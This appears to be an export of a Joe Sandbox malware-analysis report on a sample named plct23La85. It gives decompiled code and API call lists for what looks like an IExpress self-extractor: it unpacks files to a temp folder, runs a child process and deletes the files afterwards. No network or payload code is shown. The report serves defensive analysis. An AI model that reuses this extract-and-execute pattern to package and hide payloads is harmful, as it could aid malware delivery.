• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                    • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                    • API String ID: 2209512893-559176071
• Opcode ID: ff191fef92f69942bec3b851f9353c8714ab940ee97c6c96811822bb4ce3bf12
• Instruction ID: 53a1159ecd0bac4a69a13ed0de5484cb2c47cba055b0a55281d25938172359e7
• Opcode Fuzzy Hash: ff191fef92f69942bec3b851f9353c8714ab940ee97c6c96811822bb4ce3bf12
• Instruction Fuzzy Hash: 6C118C75942228BBDB24EB929C0EDFBBE7CEF127A1F504055F848A2000DB705F44E6A1

Uniqueness Score: -1.00%

Control-flow Graph: rendered graph of the basic blocks 136a60 through 136c3e (nodes marked Executed / Not Executed); the graph shows calls to 137155, 137208, GetStartupInfoW, Sleep, _amsg_exit, 136c3f, _initterm, 137060, 132bfb, exit, _ismbblead, _cexit and 13724d.
C-Code - Quality: 51%
/* Decompiled entry point: a standard MSVC CRT startup stub (one-time init lock,
   initializer tables, TLS callback, command-line split, WinMain, exit). */
_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
    signed int* _t25;
    signed int _t26;
    signed int _t29;
    int _t30;
    signed int _t37;
    signed char _t41;
    signed int _t53;
    signed int _t54;
    intOrPtr _t56;
    signed int _t58;
    signed int _t59;
    intOrPtr* _t60;
    void* _t62;
    void* _t67;
    void* _t68;
    signed int _t15;   /* temporaries the decompiler used without declaring */
    intOrPtr _t71;

    E00137155();                 /* decompiler-named startup helpers */
    _push(0x58);
    _push(0x1372b8);
    E00137208(__ebx, __edi, __esi);
    *(_t62 - 0x20) = 0;          /* in-quote flag for the command-line scan below */
    GetStartupInfoW(_t62 - 0x68); /* STARTUPINFOW at ebp-0x68: dwFlags at ebp-0x3c, wShowWindow at ebp-0x38 */
    *((intOrPtr*)(_t62 - 4)) = 0;
    _t56 = *((intOrPtr*)(*[fs:0x18] + 4)); /* current thread id from the TEB */
    _t53 = 0;
    /* One-time init lock: spin (sleeping 1000 ms per turn) while another thread owns it. */
    while(1) {
        asm("lock cmpxchg [edx], ecx");
        if(0 == 0) {
            break;
        }
        if(0 != _t56) {
            Sleep(0x3e8);
            continue;
        } else {
            _t58 = 1;
            _t53 = 1;
        }
        L7:
        /* *0x1388b0 is the CRT init state: 0 = not started, 1 = in progress, 2 = done */
        _t67 = *0x1388b0 - _t58; // 0x2
        if(_t67 != 0) {
            __eflags = *0x1388b0; // 0x2
            if(__eflags != 0) {
                *0x1381e4 = _t58;
                goto L13;
            } else {
                *0x1388b0 = _t58;
                _t37 = E00136C3F(0x1310b8, 0x1310c4); // executed; walks the first initializer table, nonzero = failure
                __eflags = _t37;
                if(__eflags == 0) {
                    goto L13;
                } else {
                    *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                    _t30 = 0xff;
                }
            }
        } else {
            _push(0x1f);
            L00136FF4();   /* per the control-flow graph: _amsg_exit(0x1f), runtime error R6031 (CRT initialised twice) */
            L13:
            _t68 = *0x1388b0 - _t58; // 0x2
            if(_t68 == 0) {
                _push(0x1310b4);
                _push(0x1310ac);
                L00137202();   /* per the control-flow graph: _initterm over the second initializer table */
                *0x1388b0 = 2;
            }
            if(_t53 == 0) {
                *0x1388ac = 0;
            }
            /* TLS init callback, invoked as (NULL, DLL_THREAD_ATTACH = 2, NULL) after a writability check */
            _t71 = *0x1388b4;
            if(*0x1388b4 != 0 && E00137060(_t71, 0x1388b4) != 0) {
                _t60 = *0x1388b4; // 0x0
                *0x13a288(0, 2, 0);
                *_t60();
            }
            /* Scan _acmdln past the (possibly quoted) program name to find lpCmdLine for WinMain. */
            _t25 = __imp___acmdln; // 0x74895b9c
            _t59 = *_t25;
            *(_t62 - 0x1c) = _t59;
            _t54 = *(_t62 - 0x20);
            while(1) {
                _t41 = *_t59;
                if(_t41 > 0x20) {
                    goto L32;
                }
                if(_t41 != 0) {
                    if(_t54 != 0) {
                        goto L32;   /* whitespace inside quotes is part of the name */
                    } else {
                        while(_t41 != 0 && _t41 <= 0x20) {   /* skip the separating whitespace */
                            _t59 = _t59 + 1;
                            *(_t62 - 0x1c) = _t59;
                            _t41 = *_t59;
                        }
                    }
                }
                /* nShowCmd: wShowWindow if STARTF_USESHOWWINDOW is set, else SW_SHOWDEFAULT (0xa) */
                __eflags = *(_t62 - 0x3c) & 0x00000001;
                if((*(_t62 - 0x3c) & 0x00000001) == 0) {
                    _t29 = 0xa;
                } else {
                    _t29 = *(_t62 - 0x38) & 0x0000ffff;
                }
                _push(_t29);
                _t30 = E00132BFB(0x130000, 0, _t59); // executed: WinMain(hInstance = image base, 0, lpCmdLine, nShowCmd)
                *0x1381e0 = _t30;
                __eflags = *0x1381f8;
                if(*0x1381f8 == 0) {
                    exit(_t30); // executed
                    goto L32;
                }
                __eflags = *0x1381e4;
                if(*0x1381e4 == 0) {
                    __imp___cexit();
                    _t30 = *0x1381e0; // 0x80070002
                }
                *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                goto L40;
                L32:
                __eflags = _t41 - 0x22;
                if(_t41 == 0x22) {   /* a double quote toggles the in-quote flag */
                    __eflags = _t54;
                    _t15 = _t54 == 0;
                    __eflags = _t15;
                    _t54 = 0 | _t15;
                    *(_t62 - 0x20) = _t54;
                }
                _t26 = _t41 & 0x000000ff;
                __imp___ismbblead(_t26);   /* a multibyte lead byte consumes the following trail byte too */
                __eflags = _t26;
                if(_t26 != 0) {
                    _t59 = _t59 + 1;
                    __eflags = _t59;
                    *(_t62 - 0x1c) = _t59;
                }
                _t59 = _t59 + 1;
                *(_t62 - 0x1c) = _t59;
            }
        }
        L40:
        return E0013724D(_t30);
    }
    _t58 = 1;
    __eflags = 1;
    goto L7;
}
Instruction addresses (the instruction column was not captured in this export):
0x00136a60 0x00136a6a 0x00136a6c 0x00136a71 0x00136a78 0x00136a7f 0x00136a85 0x00136a8e
0x00136a91 0x00136a93 0x00136a9c 0x00136aa2 0x00000000 0x00000000 0x00136aa6 0x00136ab4
0x00000000 0x00136aa8 0x00136aaa 0x00136aab 0x00136aab 0x00136abf 0x00136abf 0x00136ac5
0x00136ad1 0x00136ad7 0x00136b05 0x00000000 0x00136ad9 0x00136ad9 0x00136ae9 0x00136af0
0x00136af2 0x00000000 0x00136af4 0x00136af4 0x00136afb 0x00136afb 0x00136af2 0x00136ac7
0x00136ac7 0x00136ac9 0x00136b0b 0x00136b0b 0x00136b11 0x00136b13 0x00136b18 0x00136b1d
0x00136b24 0x00136b24 0x00136b30 0x00136b39 0x00136b39 0x00136b3b 0x00136b42 0x00136b57
0x00136b5f 0x00136b65 0x00136b65 0x00136b67 0x00136b6c 0x00136b6e 0x00136b71 0x00136b74
0x00136b74 0x00136b79 0x00000000 0x00000000 0x00136b7d 0x00136b81 0x00000000 0x00000000
0x00136b83 0x00136b8c 0x00136b8d 0x00136b90 0x00136b90 0x00136b83 0x00136b81 0x00136b94
0x00136b98 0x00136ba2 0x00136b9a 0x00136b9a 0x00136b9a 0x00136ba3 0x00136bab 0x00136bb0
0x00136bb5 0x00136bbc 0x00136bbf 0x00000000 0x00136bbf 0x00136c1e 0x00136c25 0x00136c27
0x00136c2d 0x00136c2d 0x00136c32 0x00000000 0x00136bc5 0x00136bc5 0x00136bc8 0x00136bcc
0x00136bce 0x00136bce 0x00136bd1 0x00136bd3 0x00136bd3 0x00136bd6 0x00136bda 0x00136be1
0x00136be3 0x00136be5 0x00136be5 0x00136be6 0x00136be6 0x00136be9 0x00136bea 0x00136bea
0x00136b74 0x00136c39 0x00136c3e 0x00136c3e 0x00136abe 0x00136abe 0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00137155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00137182
                                                                                                                                                                                                      • Part of subcall function 00137155: GetCurrentProcessId.KERNEL32 ref: 00137191
                                                                                                                                                                                                      • Part of subcall function 00137155: GetCurrentThreadId.KERNEL32 ref: 0013719A
                                                                                                                                                                                                      • Part of subcall function 00137155: GetTickCount.KERNEL32 ref: 001371A3
                                                                                                                                                                                                      • Part of subcall function 00137155: QueryPerformanceCounter.KERNEL32(?), ref: 001371B8
                                                                                                                                                                                                    • GetStartupInfoW.KERNEL32(?,001372B8,00000058), ref: 00136A7F
                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 00136AB4
                                                                                                                                                                                                    • _amsg_exit.MSVCRT ref: 00136AC9
                                                                                                                                                                                                    • _initterm.MSVCRT ref: 00136B1D
                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00136B49
                                                                                                                                                                                                    • exit.KERNELBASE ref: 00136BBF
                                                                                                                                                                                                    • _ismbblead.MSVCRT ref: 00136BDA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 836923961-0
                                                                                                                                                                                                    • Opcode ID: dcf265b3e286ba74d82a0aa7a2de21a9e1596242faa7cdad3115861f6abb622d
                                                                                                                                                                                                    • Instruction ID: 5f668186950e98d73b620f5947b7ef68c8a66ff8112971bf2bd4b3c08026b7d4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dcf265b3e286ba74d82a0aa7a2de21a9e1596242faa7cdad3115861f6abb622d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5441E271A48324EFEB259F68DC0576ABBE4FB44720F64811AF881E76D4CB744D818F91
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed)
                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                    			E001358C8(intOrPtr* __ecx) {
                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                    				intOrPtr _t6;
                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                    				void* _t14;
                                                                                                                                                                                                    				signed char _t16;
                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                    				intOrPtr* _t27;
                                                                                                                                                                                                    				CHAR* _t33;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				_t33 = __ecx;
                                                                                                                                                                                                    				_t27 = __ecx;
                                                                                                                                                                                                    				_t23 = __ecx + 1;
                                                                                                                                                                                                    				do {
                                                                                                                                                                                                    					_t6 =  *_t27;
                                                                                                                                                                                                    					_t27 = _t27 + 1;
                                                                                                                                                                                                    				} while (_t6 != 0);
                                                                                                                                                                                                    				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                    				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                    				if(_t20 != 0) {
                                                                                                                                                                                                    					E00131680(_t20, _t36, _t33);
                                                                                                                                                                                                    					E0013658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                    					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                    					_v8 = _t10;
                                                                                                                                                                                                    					LocalFree(_t20);
                                                                                                                                                                                                    					_t12 = _v8;
                                                                                                                                                                                                    					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                    						goto L4;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						CloseHandle(_t12);
                                                                                                                                                                                                    						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                    						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                    							goto L4;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							 *0x139124 = 0;
                                                                                                                                                                                                    							_t14 = 1;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					E001344B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					L4:
                                                                                                                                                                                                    					 *0x139124 = E00136285();
                                                                                                                                                                                                    					_t14 = 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t14;
                                                                                                                                                                                                    			}

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00135534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001358E7
                                                                                                                                                                                                    • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00135534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00135943
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00135534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0013594D
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00135534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0013595C
                                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00135534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00135963
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$TMP4351$.TMP
                                                                                                                                                                                                    • API String ID: 747627703-188559970
                                                                                                                                                                                                    • Opcode ID: bd5f53341375794b5fb6e363b500bac4753070733e0994a4ec8c234c6be8668f
                                                                                                                                                                                                    • Instruction ID: 646eebc9e16c2eeb59cc6f4639fc7da79fe192ac3ceddc6aa8d4247a691004c0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd5f53341375794b5fb6e363b500bac4753070733e0994a4ec8c234c6be8668f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6110471700210BBD7245F7AAC4DB9B7E9EEF46774F104629F58AE31D1CBB0984587A0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed)
C-Code - Quality: 84%
E00133FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
	signed int _v8;
	char _v524;
	long _v528;
	struct _PROCESS_INFORMATION _v544;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t20;
	void* _t22;
	int _t25;
	intOrPtr* _t39;
	signed int _t44;
	void* _t49;
	signed int _t50;
	intOrPtr _t53;

	_t45 = __edx;
	_t20 =  *0x138004; // 0xe764604f
	_v8 = _t20 ^ _t50;
	_t39 = __ecx;
	_t49 = 1;
	_t22 = 0;
	if(__ecx == 0) {
		L13:
		return E00136CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
	}
	asm("stosd");
	asm("stosd");
	asm("stosd");
	asm("stosd");
	_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
	if(_t25 == 0) {
		 *0x139124 = E00136285();
		FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
		_t45 = 0x4c4;
		E001344B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
		L11:
		_t49 = 0;
		L12:
		_t22 = _t49;
		goto L13;
	}
	WaitForSingleObject(_v544.hProcess, 0xffffffff);
	_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
	_t44 = _v528;
	_t53 =  *0x138a28; // 0x0
	if(_t53 == 0) {
		_t34 =  *0x139a2c; // 0x0
		if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
			_t34 = _t44 & 0xff000000;
			if((_t44 & 0xff000000) == 0xaa000000) {
				 *0x139a2c = _t44;
			}
		}
	}
	E0013411B(_t34, _t44);
	CloseHandle(_v544.hThread);
	CloseHandle(_v544);
	if(( *0x139a34 & 0x00000400) == 0 || _v528 >= 0) {
		goto L12;
	} else {
		goto L11;
	}
}

(Per-line instruction address column of the listing above not reproduced; the listed addresses span 0x00133fef to 0x0013411a.)

APIs
• CreateProcessA.KERNELBASE ref: 00134033
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00134049
• GetExitCodeProcess.KERNELBASE ref: 0013405C
• CloseHandle.KERNEL32(?), ref: 0013409C
• CloseHandle.KERNEL32(?), ref: 001340A8
• GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 001340DC
• FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 001340E9
Memory Dump Source
• Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
Similarity
• API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
• String ID:
• API String ID: 3183975587-0
• Opcode ID: 7b9cddb84f239933bbfc6516e4d8fb43e1eef9c215baf4b7c4c2f9c2c59b6062
• Instruction ID: 1647aa0a386e5225a750841e4bddbdd491d7e3a8de065cd908ea1b8e600729b1
• Opcode Fuzzy Hash: 7b9cddb84f239933bbfc6516e4d8fb43e1eef9c215baf4b7c4c2f9c2c59b6062
• Instruction Fuzzy Hash: 0D31CE31640218ABEB209B65DC48FAB777CEBA4710F2001A9F685E25A0CB70ADC5CB21
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E001351E5(void* __eflags) {
	int _t5;
	void* _t6;
	void* _t28;

	_t1 = E0013468F("UPROMPT", 0, 0) + 1; // 0x1
	_t28 = LocalAlloc(0x40, _t1);
	if(_t28 != 0) {
		if(E0013468F("UPROMPT", _t28, _t29) != 0) {
			_t5 = lstrcmpA(_t28, "<None>"); // executed
			if(_t5 != 0) {
				_t6 = E001344B9(0, 0x3e9, _t28, 0, 0x20, 4);
				LocalFree(_t28);
				if(_t6 != 6) {
                                                                                                                                                                                                    								 *0x139124 = 0x800704c7;
                                                                                                                                                                                                    								L10:
                                                                                                                                                                                                    								return 0;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							 *0x139124 = 0;
                                                                                                                                                                                                    							L6:
                                                                                                                                                                                                    							return 1;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						LocalFree(_t28);
                                                                                                                                                                                                    						goto L6;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					E001344B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					LocalFree(_t28);
                                                                                                                                                                                                    					 *0x139124 = 0x80070714;
                                                                                                                                                                                                    					goto L10;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				E001344B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                    				 *0x139124 = E00136285();
                                                                                                                                                                                                    				goto L10;
                                                                                                                                                                                                    			}

Instruction addresses: 0x001351fb 0x00135207 0x0013520b 0x0013523c 0x00135268 0x00135270 0x0013528b 0x00135293 0x0013529c 0x001352a6 0x001352b0 0x00000000 0x001352b0 0x0013529e 0x00135279 0x00000000 0x0013527b 0x00135273 0x00000000 0x00135273 0x0013524a 0x00135250 0x00135256 0x00000000 0x00135256 0x00135219 0x00135223 0x00000000

APIs
  • Part of subcall function 0013468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001346A0
  • Part of subcall function 0013468F: SizeofResource.KERNEL32(00000000,00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346A9
  • Part of subcall function 0013468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001346C3
  • Part of subcall function 0013468F: LoadResource.KERNEL32(00000000,00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346CC
  • Part of subcall function 0013468F: LockResource.KERNEL32(00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346D3
  • Part of subcall function 0013468F: memcpy_s.MSVCRT ref: 001346E5
  • Part of subcall function 0013468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001346EF
• LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00132F4D,?,00000002,00000000), ref: 00135201
• LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00135250
  • Part of subcall function 001344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00134518
  • Part of subcall function 001344B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00134554
  • Part of subcall function 00136285: GetLastError.KERNEL32(00135BBC), ref: 00136285
Strings
Memory Dump Source
• Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                    • String ID: <None>$UPROMPT
                                                                                                                                                                                                    • API String ID: 957408736-2980973527
                                                                                                                                                                                                    • Opcode ID: c8b96a161ff0a969efc34c7e1d781c837ec2399e4f5d959d1cadb005014f4608
                                                                                                                                                                                                    • Instruction ID: 64b06a0bb0c31a70615b2c46ebcab393bf04d3ab3bcfde0842bf38877d635a38
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8b96a161ff0a969efc34c7e1d781c837ec2399e4f5d959d1cadb005014f4608
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC1101B1200201FFE3286BB15C4AF3B759EEF98BA0F514029F682E6590DBB8DC405234
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                                                                    			E001352B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				signed int _t9;
                                                                                                                                                                                                    				signed int _t11;
                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                    				void* _t29;
                                                                                                                                                                                                    				CHAR** _t31;
                                                                                                                                                                                                    				void* _t32;
                                                                                                                                                                                                    				signed int _t33;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t28 = __edi;
                                                                                                                                                                                                    				_t22 = __ecx;
                                                                                                                                                                                                    				_t21 = __ebx;
                                                                                                                                                                                                    				_t9 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                    				_push(__esi);
                                                                                                                                                                                                    				_t31 =  *0x1391e0; // 0x3078e20
                                                                                                                                                                                                    				if(_t31 != 0) {
                                                                                                                                                                                                    					_push(__edi);
                                                                                                                                                                                                    					do {
                                                                                                                                                                                                    						_t29 = _t31;
                                                                                                                                                                                                    						if( *0x138a24 == 0 &&  *0x139a30 == 0) {
                                                                                                                                                                                                    							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                    							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t31 = _t31[1];
                                                                                                                                                                                                    						LocalFree( *_t29);
                                                                                                                                                                                                    						LocalFree(_t29);
                                                                                                                                                                                                    					} while (_t31 != 0);
                                                                                                                                                                                                    					_pop(_t28);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t11 =  *0x138a20; // 0x0
                                                                                                                                                                                                    				_pop(_t32);
                                                                                                                                                                                                    				if(_t11 != 0 &&  *0x138a24 == 0 &&  *0x139a30 == 0) {
                                                                                                                                                                                                    					_push(_t22);
                                                                                                                                                                                                    					E00131781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                    					if(( *0x139a34 & 0x00000020) != 0) {
                                                                                                                                                                                                    						E001365E8( &_v268);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                    					_t22 =  &_v268;
                                                                                                                                                                                                    					E00132390( &_v268);
                                                                                                                                                                                                    					_t11 =  *0x138a20; // 0x0
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if( *0x139a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                    					_t11 = E00131FE1(_t22); // executed
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				 *0x138a20 =  *0x138a20 & 0x00000000;
                                                                                                                                                                                                    				return E00136CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                    			}

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetFileAttributesA.KERNELBASE(03078E20,00000080,?,00000000), ref: 001352F2
                                                                                                                                                                                                    • DeleteFileA.KERNELBASE(03078E20), ref: 001352FA
                                                                                                                                                                                                    • LocalFree.KERNEL32(03078E20,?,00000000), ref: 00135305
                                                                                                                                                                                                    • LocalFree.KERNEL32(03078E20), ref: 0013530C
                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(001311FC,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00135363
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00135334
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                    • API String ID: 2833751637-3290032183
